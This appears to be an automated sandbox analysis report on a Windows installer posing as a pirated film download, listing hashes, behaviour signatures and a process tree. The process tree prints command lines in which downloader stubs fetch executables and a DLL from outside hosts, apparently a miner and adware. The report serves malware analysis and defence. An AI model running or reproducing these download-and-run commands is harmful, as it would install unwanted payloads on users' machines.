Analysis
-
max time kernel
0s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
25/12/2023, 00:22
Static task
static1
Behavioral task
behavioral1
Sample
1c96e43f9fc0224e4f6d32933e41aabd.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
1c96e43f9fc0224e4f6d32933e41aabd.exe
Resource
win10v2004-20231215-en
General
-
Target
1c96e43f9fc0224e4f6d32933e41aabd.exe
-
Size
492KB
-
MD5
1c96e43f9fc0224e4f6d32933e41aabd
-
SHA1
30c62455f99aeda70518bedfe18b889b13aaea8d
-
SHA256
46b1dbddd3052bb14cd159679cb6ab0f2b2e873ade6f156f4a4094cf7e21f0ee
-
SHA512
d6a193ddda998cef1a2191d7a0cebb7ad1cdd15ba5acabc6c290710c2802cf0c8b3f7930f271a65cb5b56bec1cc1b9e0d8ab0a6b70b83530f58434ecd02a0832
-
SSDEEP
6144:Kuk4fqjCHQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:w4fwM6peEUBwXVwM9vylzdYvH7AwC
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
pid Process 1820 downloaderSTUB.exe 1124 downloaderSTUB.exe 3048 downloaderSTUB.exe 2164 downloaderDDLR.exe 2816 downloaderOFFER0.exe -
Loads dropped DLL 6 IoCs
pid Process 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0009000000015dd8-4.dat nsis_installer_1 behavioral1/files/0x0009000000015dd8-4.dat nsis_installer_2 -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2360 wrote to memory of 1820 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 22 PID 2360 wrote to memory of 1820 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 22 PID 2360 wrote to memory of 1820 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 22 PID 2360 wrote to memory of 1820 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 22 PID 2360 wrote to memory of 3048 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 21 PID 2360 wrote to memory of 3048 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 21 PID 2360 wrote to memory of 3048 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 21 PID 2360 wrote to memory of 3048 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 21 PID 2360 wrote to memory of 1124 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 20 PID 2360 wrote to memory of 1124 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 20 PID 2360 wrote to memory of 1124 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 20 PID 2360 wrote to memory of 1124 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 20 PID 2360 wrote to memory of 2164 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 19 PID 2360 wrote to memory of 2164 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 19 PID 2360 wrote to memory of 2164 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 19 PID 2360 wrote to memory of 2164 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 19 PID 2360 wrote to memory of 2816 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 18 PID 2360 wrote to memory of 2816 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 18 PID 2360 wrote to memory of 2816 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 18 PID 2360 wrote to memory of 2816 2360 1c96e43f9fc0224e4f6d32933e41aabd.exe 18
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c96e43f9fc0224e4f6d32933e41aabd.exe"C:\Users\Admin\AppData\Local\Temp\1c96e43f9fc0224e4f6d32933e41aabd.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\preinstaller.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\preinstaller.exe 0 "Pirates of the Caribbean 4; On Stranger Tides (2011) DVDRip NL s" "Download"2⤵PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderOFFER0.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\optimizer.exe"2⤵
- Executes dropped EXE
PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderDDLR.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\DirectDownloaderInstaller.exe"2⤵
- Executes dropped EXE
PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\updater.exe"2⤵
- Executes dropped EXE
PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\OpenCL.dll"2⤵
- Executes dropped EXE
PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exeC:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\3548e572397e44dcc7dc2a93299d464e\stub.exe"2⤵
- Executes dropped EXE
PID:1820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
58KB
MD5c7f6ed56312c8fbb58ae6ed445c38df4
SHA1e2dba94ef052db774478b9f7198c1a2298b334e5
SHA256fdb8452173a4f116f6e362ab5466c3c16bf6697502fe3d01db0d82f0e339de24
SHA512ac43e5bb31c3c0876a7768553916cce76d92088e62594e8463b128a0d6e587c48152a5efcf0b2a5e8fb43028d46913df114ae3c3750b7e6c4212c7044518ba43
-
Filesize
14KB
MD5a5f8399a743ab7f9c88c645c35b1ebb5
SHA1168f3c158913b0367bf79fa413357fbe97018191
SHA256dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9
SHA512824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977